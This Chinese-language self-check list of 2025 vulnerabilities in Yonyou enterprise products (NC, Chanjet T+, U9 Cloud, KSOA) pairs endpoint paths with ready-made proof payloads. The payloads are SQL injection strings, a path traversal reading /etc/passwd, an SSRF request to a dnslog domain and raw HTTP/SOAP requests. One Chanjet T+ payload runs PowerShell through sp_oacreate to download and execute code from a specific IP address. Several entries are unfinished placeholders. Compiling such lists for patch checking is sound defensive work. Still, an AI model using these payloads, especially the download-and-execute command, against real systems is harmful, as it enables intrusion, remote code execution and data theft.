用友相关漏洞自查表(2025年)
-
用友NC listUserSharingEvents 存在SQL注入
- 漏洞类型:SQL注入
- 利用路径:/portal/pt/oacoSchedulerEvents/listUserSharingEvents
- 验证方式:/portal/pt/oacoSchedulerEvents/listUserSharingEvents?agent=6')+AND+1=UTL_INADDR.GET_HOST_ADDRESS('~'||(user)||'~')--&pageId=login&sch_ed=2&sch_sd=1
-
用友bip远程代码执行
- 漏洞类型:RCE
- 利用路径:待补充
- 验证方式:待补充
-
用友 畅捷通T+InitContext处存在登录绕过漏洞
- 漏洞类型:越权
- 利用路径:待补充
- 验证方式:待补充
-
用友 畅捷通T+GetAll处存在敏感信息泄露漏洞
- 漏洞类型:信息泄露
- 利用路径:待补充
- 验证方式:待补充
-
用友 畅捷通CRM newleadset.php 存在SQL注入
- 漏洞类型:SQL注入
- 利用路径:/lead/newleadset.php
- 验证方式:/lead/newleadset.php?gblOrgID=1+AND+%28SELECT+5244+FROM+%28SELECT%28SLEEP%289%29%29%29HAjH%29--+-&DontCheckLogin=1
-
用友 畅捷通T+Load处存在SQL注入
- 漏洞类型:SQL注入
- 利用路径://tplus/UFAQD/KeyInfoList.aspx
- 验证方式://tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=%27);declare%20%40shell%20int%3Bexec%20sp_oacreate%20%22wscript.shell%22%2C%40shell%20output%3Bexec%20sp_oamethod%20%40shell%2C%22run%22%2Cnull%2C%22sqlps%20IEX%20((new-object%20net.webclient).downloadstring('http%3A%2F%2F103.199.106.62%3A6000%2Fbeta'))%22%3b--+
-
用友 畅捷通T+ keyEdit.aspx 存在SQL注入
- 漏洞类型:SQL注入
- 利用路径:/tplus/UFAQD/keyEdit.aspx
- 验证方式:GET /tplus/UFAQD/keyEdit.aspx?KeyID=222%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
-
用友 畅捷通AddressSettingController存在SSRF
- 漏洞类型:SSRF
- 利用路径:/tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx
- 验证方式:
POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: ASP.NET_SessionId=sfzg0pgxvld3ltgimecqkjg4; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1721822405; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1721822415; HMACCOUNT=AFE08148BD092161 Upgrade-Insecure-Requests: 1 Priority: u=0, i Content-Type: application/x-www-form-urlencoded Content-Length: 36 { "address":"bftsce.dnslog.cn" }
-
用友畅捷通TPLUS AccountClearControler SQL注入
- 漏洞类型:SQL注入
- 漏洞路径:/tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx
- 验证方式:/tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx?method=GetisInitBCRetail
-
用友时空KSOA SQL注入
- 漏洞类型:SQL注入
- 漏洞路径:/worksheet/workslist.jsp
- 验证方式:/worksheet/workslist.jsp?id=1';WAITFOR+DELAY+'0:0:3
-
用友NC deleteEvent SQL注入
- 漏洞类型:SQL注入
- 漏洞路径:/portal/pt/oacoSchedulerEvents/deleteEvent
- 验证方式:待确认
-
用友NC getFormItem doPost SQL注入
- 漏洞类型:SQL注入
- 漏洞路径:/portal/pt/servlet/getFormItem/doPost
- 验证方式:
POST /portal/pt/servlet/getFormItem/doPost?pageId=login&clazz=nc.uap.wfm.vo.base.ProDefBaseVO&proDefPk=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Length: 19
-
用友U9 Cloud print/DynamaticExport.aspx 接口任意文件下载
- 漏洞类型:任意文件读取
- 漏洞路径:/Portal/Print/DynamaticExport.aspx
- 验证方式:/Portal/Print/DynamaticExport.aspx?filePath=../../etc/passwd
-
用友Nccloud系统反序列化漏洞
- 漏洞类型:
- 漏洞路径:
- 验证方式:
-
用友 NC IMetaWebService4BqCloud 数据源 SQL 注入
- 漏洞类型:SQL注入
- 漏洞路径:/uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud
- 验证方式:
POST /uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud HTTP/1.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=09133CFE3A7B0CE8341AB1A7DEDFCCDE.server
Connection: keep-aliveSOAP
Action: urn:loadFields
Content-Type: text/xml;charset=UTF-8
Host:
Content-Length: 350
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imet="http://meta.ae.pubitf.uap/IMetaWebService4BqCloud">
<soapenv:Header/>
<soapenv:Body>
<imet:loadFields> <!--type: string-->
<imet:string>SmartModel^1';*</imet:string>
</imet:loadFields>
</soapenv:Body>
</soapenv:Envelope>
-
用友 U9 Cloud 远程代码执行
- 漏洞类型:RCE
- 漏洞路径:MachineKey硬编码
- 验证方式:MachineKey硬编码,构造ViewState反序列化
-
用友YonBIP(R6旗舰版)任意用户密码重置
- 漏洞类型:越权
- 漏洞路径:待确认
- 验证方式:待确认
-
用友 U9 Cloud PDFDirectPrint.aspx 反序列化
- 漏洞类型:反序列化
- 漏洞路径:待确认
- 验证方式:待确认
-
用友u8 cloud QuerySoapServlet 存在SQL注入
- 漏洞类型:SQL注入
- 漏洞路径:QuerySoapServlet
- 验证方式:待确认
-
用友nmc服务任意文件上传
- 漏洞类型:文件上传
- 漏洞路径:待确认
- 验证方式:待确认
-
用友NC baplink SQL注入
- 漏洞类型:SQL注入
- 漏洞路径:/portal/pt/baplink/content
- 验证方式:
GET /portal/pt/baplink/content?pageId=login&pk_funnode=-1* HTTP/1.1 Host: Accept-Encoding: identity User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 Accept: text/html, image/gif, image/jpeg, ; q=.2, /; q=.2

浙公网安备 33010602011771号